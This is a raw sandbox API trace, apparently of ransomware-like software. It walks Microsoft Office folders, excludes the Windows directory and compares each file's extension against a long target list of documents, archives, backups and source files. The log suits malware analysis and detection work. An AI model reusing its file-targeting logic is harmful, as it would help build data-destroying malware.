(lpString1=".pub", lpString2=".WMF") returned -1 [0289.690] lstrlenW (lpString=".pwm") returned 4 [0289.690] lstrcmpiW (lpString1=".pwm", lpString2=".WMF") returned -1 [0289.690] lstrlenW (lpString=".pxr") returned 4 [0289.690] lstrcmpiW (lpString1=".pxr", lpString2=".WMF") returned -1 [0289.691] lstrlenW (lpString=".py") returned 3 [0289.691] lstrcmpiW (lpString1=".py", lpString2="WMF") returned -1 [0289.691] lstrlenW (lpString=".qt") returned 3 [0289.691] lstrcmpiW (lpString1=".qt", lpString2="WMF") returned -1 [0289.691] lstrlenW (lpString=".r3d") returned 4 [0289.722] lstrcmpiW (lpString1=".r3d", lpString2=".WMF") returned -1 [0289.722] lstrlenW (lpString=".raf") returned 4 [0289.722] lstrcmpiW (lpString1=".raf", lpString2=".WMF") returned -1 [0289.722] lstrlenW (lpString=".rar") returned 4 [0289.722] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0289.722] lstrlenW (lpString=".raw") returned 4 [0289.722] lstrcmpiW (lpString1=".raw", lpString2=".WMF") returned -1 [0289.726] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4014d58, Size=0x8000) returned 0x4014d58 [0289.726] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6d2045, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6d2045, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6f8253, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x634, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="BS00224_.WMF", cAlternateFileName="")) returned 1 [0289.731] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4014d58, Size=0x10000) returned 0x40e7f00 [0289.733] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeb7dac, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5c0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="FD00543_.WMF", cAlternateFileName="")) returned 1 [0289.743] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x40e7f00, Size=0x20000) returned 0x4097ee8 [0289.745] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1864, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="J0105414.WMF", cAlternateFileName="")) returned 1 [0290.400] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4097ee8, Size=0x40000) [0290.400] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4097ee8, Size=0x40000) returned 0x40e7f00 [0290.402] FindNextFileW (in: hFindFile=0x39482e8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf42d018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20e4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="J0309904.WMF", cAlternateFileName="")) returned 1 [0290.422] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0290.422] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0290.485] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4127f08 | out: hHeap=0x470000) returned 1 [0290.485] FindNextFileW (in: hFindFile=0x39483a8, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1113bba3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1113bba3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Backgrounds", cAlternateFileName="BACKGR~1")) returned 0 [0290.485] FindClose (in: hFindFile=0x39483a8 | out: hFindFile=0x39483a8) returned 1 [0290.485] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0290.485] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 0 [0290.485] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0290.486] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0290.486] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Document Themes 16", cAlternateFileName="DOCUME~1")) returned 1 [0290.504] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0290.504] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11377f40, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11482f7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Theme Effects", cAlternateFileName="THEMEE~1")) returned 1 [0290.510] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0290.510] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11436ace, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115da4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Theme Fonts", cAlternateFileName="THEMEF~1")) returned 1 [0290.517] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0290.517] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x114a91d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x114a91d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11567da2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xbc7c1, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Wisp.thmx", cAlternateFileName="WISP~1.THM")) returned 1 [0290.517] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4127f08 | out: hHeap=0x470000) returned 1 [0290.517] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x114f5747, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114f5747, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Flattener", cAlternateFileName="FLATTE~1")) returned 1 [0290.529] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0290.529] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee45f66d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115da4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="fre", cAlternateFileName="")) returned 1 [0290.705] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4067ed8 | out: hHeap=0x470000) returned 1 [0290.706] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1f5fb21, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b2abe77, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b2abe77, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Integration", cAlternateFileName="INTEGR~1")) returned 1 [0290.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Integration") returned 50 [0290.716] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="C:\\Program Files\\Microsoft Office\\root\\Integration") returned 1 [0290.716] lstrlenW (lpString="Integration") returned 11 [0290.716] lstrcmpiW (lpString1="C:\\WINDOWS", lpString2="Integration") returned -1 [0290.716] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4057ed0 [0290.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\Integration") returned 50 [0290.719] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Integration\\*", lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1f5fb21, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b2abe77, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b2abe77, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x39482a8 [0290.745] FindNextFileW (in: hFindFile=0x39482a8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd1f5fb21, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b2abe77, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3b2abe77, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0290.746] FindNextFileW (in: hFindFile=0x39482a8, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe33a4c67, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe33a4c67, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3607185, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc61000, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="C2RInt.16.msi", cAlternateFileName="C2RINT~1.MSI")) returned 1 [0290.746] lstrlenW (lpString="C2RInt.16.msi") returned 13 [0290.746] lstrlenW (lpString=".1cd") returned 4 [0290.746] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0290.746] lstrlenW (lpString=".3ds") returned 4 [0290.746] lstrcmpiW (lpString1=".3ds", lpString2=".msi") returned -1 [0290.746] lstrlenW (lpString=".3fr") returned 4 [0290.746] lstrcmpiW (lpString1=".3fr", lpString2=".msi") returned -1 [0290.746] lstrlenW (lpString=".3g2") returned 4 [0290.746] lstrcmpiW (lpString1=".3g2", lpString2=".msi") returned -1 [0290.746] lstrlenW (lpString=".3gp") returned 4 [0290.746] lstrcmpiW (lpString1=".3gp", lpString2=".msi") returned -1 [0290.746] lstrlenW (lpString=".7z") returned 3 [0290.746] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0290.746] lstrlenW (lpString=".accda") returned 6 [0290.747] lstrcmpiW (lpString1=".accda", lpString2="16.msi") returned -1 [0290.748] lstrlenW (lpString=".accdb") returned 6 [0290.748] lstrcmpiW (lpString1=".accdb", lpString2="16.msi") returned -1 [0290.749] lstrlenW (lpString=".accdc") returned 6 [0290.749] lstrcmpiW (lpString1=".accdc", lpString2="16.msi") returned -1 [0290.749] lstrlenW (lpString=".accde") returned 6 [0290.749] lstrcmpiW (lpString1=".accde", lpString2="16.msi") returned -1 [0290.749] lstrlenW (lpString=".accdt") returned 6 [0290.749] lstrcmpiW (lpString1=".accdt", lpString2="16.msi") returned -1 [0290.749] lstrlenW (lpString=".accdw") returned 6 [0290.749] lstrcmpiW (lpString1=".accdw", lpString2="16.msi") returned -1 [0290.749] lstrlenW (lpString=".adb") returned 4 [0290.749] lstrcmpiW (lpString1=".adb", lpString2=".msi") returned -1 [0290.749] lstrlenW (lpString=".adp") returned 4 [0290.749] lstrcmpiW (lpString1=".adp", lpString2=".msi") returned -1 [0290.749] lstrlenW (lpString=".ai") returned 3 [0290.749] lstrcmpiW (lpString1=".ai", lpString2="msi") returned -1 [0290.750] lstrlenW (lpString=".ai3") returned 4 [0290.750] lstrcmpiW (lpString1=".ai3", lpString2=".msi") returned -1 [0290.750] lstrlenW (lpString=".ai4") returned 4 [0290.750] lstrcmpiW (lpString1=".ai4", lpString2=".msi") returned -1 [0290.750] lstrlenW (lpString=".ai5") returned 4 [0290.750] lstrcmpiW (lpString1=".ai5", lpString2=".msi") returned -1 [0290.750] lstrlenW (lpString=".ai6") returned 4 [0290.750] lstrcmpiW (lpString1=".ai6", lpString2=".msi") returned -1 [0290.750] lstrlenW (lpString=".ai7") returned 4 [0290.750] lstrcmpiW (lpString1=".ai7", lpString2=".msi") returned -1 [0290.750] lstrlenW (lpString=".ai8") returned 4 [0290.750] lstrcmpiW (lpString1=".ai8", lpString2=".msi") returned -1 [0290.750] lstrlenW (lpString=".anim") returned 5 [0290.750] lstrcmpiW (lpString1=".anim", lpString2="6.msi") returned -1 [0290.751] lstrlenW (lpString=".arw") returned 4 [0290.751] lstrcmpiW (lpString1=".arw", lpString2=".msi") returned -1 [0290.751] lstrlenW (lpString=".as") returned 3 [0290.751] lstrcmpiW (lpString1=".as", lpString2="msi") returned -1 [0290.752] lstrlenW (lpString=".asa") returned 4 [0290.756] lstrcmpiW (lpString1=".asa", lpString2=".msi") returned -1 [0290.756] lstrlenW (lpString=".asc") returned 4 [0290.756] lstrcmpiW (lpString1=".asc", lpString2=".msi") returned -1 [0290.756] lstrlenW (lpString=".ascx") returned 5 [0290.756] lstrcmpiW (lpString1=".ascx", lpString2="6.msi") returned -1 [0290.756] lstrlenW (lpString=".asm") returned 4 [0290.756] lstrcmpiW (lpString1=".asm", lpString2=".msi") returned -1 [0290.756] lstrlenW (lpString=".asmx") returned 5 [0290.756] lstrcmpiW (lpString1=".asmx", lpString2="6.msi") returned -1 [0290.756] lstrlenW (lpString=".asp") returned 4 [0290.756] lstrcmpiW (lpString1=".asp", lpString2=".msi") returned -1 [0290.756] lstrlenW (lpString=".aspx") returned 5 [0290.756] lstrcmpiW (lpString1=".aspx", lpString2="6.msi") returned -1 [0290.756] lstrlenW (lpString=".asr") returned 4 [0290.756] lstrcmpiW (lpString1=".asr", lpString2=".msi") returned -1 [0290.756] lstrlenW (lpString=".asx") returned 4 [0290.757] lstrcmpiW (lpString1=".asx", lpString2=".msi") returned -1 [0290.757] lstrlenW (lpString=".avi") returned 4 [0290.757] lstrcmpiW (lpString1=".avi", lpString2=".msi") returned -1 [0290.757] lstrlenW (lpString=".avs") returned 4 [0290.757] lstrcmpiW (lpString1=".avs", lpString2=".msi") returned -1 [0290.757] lstrlenW (lpString=".backup") returned 7 [0290.757] lstrcmpiW (lpString1=".backup", lpString2=".16.msi") returned 1 [0290.757] lstrlenW (lpString=".bak") returned 4 [0290.757] lstrcmpiW (lpString1=".bak", lpString2=".msi") returned -1 [0290.757] lstrlenW (lpString=".bay") returned 4 [0290.757] lstrcmpiW (lpString1=".bay", lpString2=".msi") returned -1 [0290.757] lstrlenW (lpString=".bd") returned 3 [0290.757] lstrcmpiW (lpString1=".bd", lpString2="msi") returned -1 [0290.757] lstrlenW (lpString=".bin") returned 4 [0290.757] lstrcmpiW (lpString1=".bin", lpString2=".msi") returned -1 [0290.757] lstrlenW (lpString=".bmp") returned 4 [0290.757] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0290.757] lstrlenW (lpString=".bz2") returned 4 [0290.757] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0290.757] lstrlenW (lpString=".c") returned 2 [0290.757] lstrcmpiW (lpString1=".c", lpString2="si") returned -1 [0290.757] lstrlenW (lpString=".cdr") returned 4 [0290.758] lstrcmpiW (lpString1=".cdr", lpString2=".msi") returned -1 [0290.758] lstrlenW (lpString=".cer") returned 4 [0290.758] lstrcmpiW (lpString1=".cer", lpString2=".msi") returned -1 [0290.758] lstrlenW (lpString=".cf") returned 3 [0290.758] lstrcmpiW (lpString1=".cf", lpString2="msi") returned -1 [0290.758] lstrlenW (lpString=".cfc") returned 4 [0290.758] lstrcmpiW (lpString1=".cfc", lpString2=".msi") returned -1 [0290.758] lstrlenW (lpString=".cfm") returned 4 [0290.758] lstrcmpiW (lpString1=".cfm", lpString2=".msi") returned -1 [0290.758] lstrlenW (lpString=".cfml") returned 5 [0290.758] lstrcmpiW (lpString1=".cfml", lpString2="6.msi") returned -1 [0290.758] lstrlenW (lpString=".cfu") returned 4 [0290.758] lstrcmpiW (lpString1=".cfu", lpString2=".msi") returned -1 [0290.758] lstrlenW (lpString=".chm") returned 4 [0290.759] lstrcmpiW (lpString1=".chm", lpString2=".msi") returned -1 [0290.759] lstrlenW (lpString=".cin") returned 4 [0290.759] lstrcmpiW (lpString1=".cin", lpString2=".msi") returned -1 [0290.759] lstrlenW (lpString=".class") returned 6 [0290.759] lstrcmpiW (lpString1=".class", lpString2="16.msi") returned -1 [0290.759] lstrlenW (lpString=".clx") returned 4 [0290.759] lstrcmpiW (lpString1=".clx", lpString2=".msi") returned -1 [0290.759] lstrlenW (lpString=".config") returned 7 [0290.759] lstrcmpiW (lpString1=".config", lpString2=".16.msi") returned 1 [0290.759] lstrlenW (lpString=".cpp") returned 4 [0290.759] lstrcmpiW (lpString1=".cpp", lpString2=".msi") returned -1 [0290.759] lstrlenW (lpString=".cr2") returned 4 [0290.759] lstrcmpiW (lpString1=".cr2", lpString2=".msi") returned -1 [0290.759] lstrlenW (lpString=".crt") returned 4 [0290.759] lstrcmpiW (lpString1=".crt", lpString2=".msi") returned -1 [0290.760] lstrlenW (lpString=".crw") returned 4 [0290.760] lstrcmpiW (lpString1=".crw", lpString2=".msi") returned -1 [0290.760] lstrlenW (lpString=".cs") returned 3 [0290.760] lstrcmpiW (lpString1=".cs", lpString2="msi") returned -1 [0290.760] lstrlenW (lpString=".css") returned 4 [0290.760] lstrcmpiW (lpString1=".css", lpString2=".msi") returned -1 [0290.760] lstrlenW (lpString=".csv") returned 4 [0290.760] lstrcmpiW (lpString1=".csv", lpString2=".msi") returned -1 [0290.760] lstrlenW (lpString=".cub") returned 4 [0290.760] lstrcmpiW (lpString1=".cub", lpString2=".msi") returned -1 [0290.760] lstrlenW (lpString=".dae") returned 4 [0290.760] lstrcmpiW (lpString1=".dae", lpString2=".msi") returned -1 [0290.760] lstrlenW (lpString=".dat") returned 4 [0290.760] lstrcmpiW (lpString1=".dat", lpString2=".msi") returned -1 [0290.760] lstrlenW (lpString=".db") returned 3 [0290.760] lstrcmpiW (lpString1=".db", lpString2="msi") returned -1 [0290.760] lstrlenW (lpString=".dbf") returned 4 [0290.760] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0290.760] lstrlenW (lpString=".dbx") returned 4 [0290.760] lstrcmpiW (lpString1=".dbx", lpString2=".msi") returned -1 [0290.760] lstrlenW (lpString=".dc3") returned 4 [0290.760] lstrcmpiW (lpString1=".dc3", lpString2=".msi") returned -1 [0290.760] lstrlenW (lpString=".dcm") returned 4 [0290.760] lstrcmpiW (lpString1=".dcm", lpString2=".msi") returned -1 [0290.760] lstrlenW (lpString=".dcr") returned 4 [0290.760] lstrcmpiW (lpString1=".dcr", lpString2=".msi") returned -1 [0290.760] lstrlenW (lpString=".der") returned 4 [0290.760] lstrcmpiW (lpString1=".der", lpString2=".msi") returned -1 [0290.760] lstrlenW (lpString=".dib") returned 4 [0290.760] lstrcmpiW (lpString1=".dib", lpString2=".msi") returned -1 [0290.760] lstrlenW (lpString=".dic") returned 4 [0290.760] lstrcmpiW (lpString1=".dic", lpString2=".msi") returned -1 [0290.760] lstrlenW (lpString=".dif") returned 4 [0290.760] lstrcmpiW (lpString1=".dif", lpString2=".msi") returned -1 [0290.760] lstrlenW (lpString=".divx") returned 5 [0290.761] lstrcmpiW (lpString1=".divx", lpString2="6.msi") returned -1 [0290.761] lstrlenW (lpString=".djvu") returned 5 [0290.761] lstrcmpiW (lpString1=".djvu", lpString2="6.msi") returned -1 [0290.761] lstrlenW (lpString=".dng") returned 4 [0290.761] lstrcmpiW (lpString1=".dng", lpString2=".msi") returned -1 [0290.761] lstrlenW (lpString=".doc") returned 4 [0290.761] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0290.761] lstrlenW (lpString=".docm") returned 5 [0290.761] lstrcmpiW (lpString1=".docm", lpString2="6.msi") returned -1 [0290.761] lstrlenW (lpString=".docx") returned 5 [0290.761] lstrcmpiW (lpString1=".docx", lpString2="6.msi") returned -1 [0290.761] lstrlenW (lpString=".dot") returned 4 [0290.761] lstrcmpiW (lpString1=".dot", lpString2=".msi") returned -1 [0290.761] lstrlenW (lpString=".dotm") returned 5 [0290.761] lstrcmpiW (lpString1=".dotm", lpString2="6.msi") returned -1 [0290.761] lstrlenW (lpString=".dotx") returned 5 [0290.761] lstrcmpiW (lpString1=".dotx", lpString2="6.msi") returned -1 [0290.761] lstrlenW (lpString=".dpx") returned 4 [0290.761] lstrcmpiW (lpString1=".dpx", lpString2=".msi") returned -1 [0290.761] lstrlenW (lpString=".dqy") returned 4 [0290.761] lstrcmpiW (lpString1=".dqy", lpString2=".msi") returned -1 [0290.761] lstrlenW (lpString=".dsn") returned 4 [0290.761] lstrcmpiW (lpString1=".dsn", lpString2=".msi") returned -1 [0290.761] lstrlenW (lpString=".dt") returned 3 [0290.761] lstrcmpiW (lpString1=".dt", lpString2="msi") returned -1 [0290.761] lstrlenW (lpString=".dtd") returned 4 [0290.761] lstrcmpiW (lpString1=".dtd", lpString2=".msi") returned -1 [0290.761] lstrlenW (lpString=".dwg") returned 4 [0290.761] lstrcmpiW (lpString1=".dwg", lpString2=".msi") returned -1 [0290.761] lstrlenW (lpString=".dwt") returned 4 [0290.761] lstrcmpiW (lpString1=".dwt", lpString2=".msi") returned -1 [0290.761] lstrlenW (lpString=".dx") returned 3 [0290.761] lstrcmpiW (lpString1=".dx", lpString2="msi") returned -1 [0290.761] lstrlenW (lpString=".dxf") returned 4 [0290.761] lstrcmpiW (lpString1=".dxf", lpString2=".msi") returned -1 [0290.762] lstrlenW (lpString=".edml") returned 5 [0290.762] lstrcmpiW (lpString1=".edml", lpString2="6.msi") returned -1 [0290.762] lstrlenW (lpString=".efd") returned 4 [0290.762] lstrcmpiW (lpString1=".efd", lpString2=".msi") returned -1 [0290.762] lstrlenW (lpString=".elf") returned 4 [0290.762] lstrcmpiW (lpString1=".elf", lpString2=".msi") returned -1 [0290.762] lstrlenW (lpString=".emf") returned 4 [0290.762] lstrcmpiW (lpString1=".emf", lpString2=".msi") returned -1 [0290.762] lstrlenW (lpString=".emz") returned 4 [0290.762] lstrcmpiW (lpString1=".emz", lpString2=".msi") returned -1 [0290.762] lstrlenW (lpString=".epf") returned 4 [0290.762] lstrcmpiW (lpString1=".epf", lpString2=".msi") returned -1 [0290.762] lstrlenW (lpString=".eps") returned 4 [0290.762] lstrcmpiW (lpString1=".eps", lpString2=".msi") returned -1 [0290.762] lstrlenW (lpString=".epsf") returned 5 [0290.762] lstrcmpiW (lpString1=".epsf", lpString2="6.msi") returned -1 [0290.762] lstrlenW (lpString=".epsp") returned 5 [0290.762] lstrcmpiW (lpString1=".epsp", lpString2="6.msi") returned -1 [0290.762] lstrlenW (lpString=".erf") returned 4 [0290.762] lstrcmpiW (lpString1=".erf", lpString2=".msi") returned -1 [0290.762] lstrlenW (lpString=".exr") returned 4 [0290.762] lstrcmpiW (lpString1=".exr", lpString2=".msi") returned -1 [0290.762] lstrlenW (lpString=".f4v") returned 4 [0290.762] lstrcmpiW (lpString1=".f4v", lpString2=".msi") returned -1 [0290.762] lstrlenW (lpString=".fido") returned 5 [0290.762] lstrcmpiW (lpString1=".fido", lpString2="6.msi") returned -1 [0290.762] lstrlenW (lpString=".flm") returned 4 [0290.762] lstrcmpiW (lpString1=".flm", lpString2=".msi") returned -1 [0290.762] lstrlenW (lpString=".flv") returned 4 [0290.762] lstrcmpiW (lpString1=".flv", lpString2=".msi") returned -1 [0290.762] lstrlenW (lpString=".frm") returned 4 [0290.762] lstrcmpiW (lpString1=".frm", lpString2=".msi") returned -1 [0290.763] lstrlenW (lpString=".fxg") returned 4 [0290.763] lstrcmpiW (lpString1=".fxg", lpString2=".msi") returned -1 [0290.763] lstrlenW (lpString=".geo") returned 4 [0290.763] lstrcmpiW (lpString1=".geo", lpString2=".msi") returned -1 [0290.763] lstrlenW (lpString=".gif") returned 4 [0290.763] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0290.763] lstrlenW (lpString=".grs") returned 4 [0290.763] lstrcmpiW (lpString1=".grs", lpString2=".msi") returned -1 [0290.763] lstrlenW (lpString=".gz") returned 3 [0290.763] lstrcmpiW (lpString1=".gz", lpString2="msi") returned -1 [0290.763] lstrlenW (lpString=".h") returned 2 [0290.763] lstrcmpiW (lpString1=".h", lpString2="si") returned -1 [0290.763] lstrlenW (lpString=".hdr") returned 4 [0290.763] lstrcmpiW (lpString1=".hdr", lpString2=".msi") returned -1 [0290.763] lstrlenW (lpString=".hpp") returned 4 [0290.763] lstrcmpiW (lpString1=".hpp", lpString2=".msi") returned -1 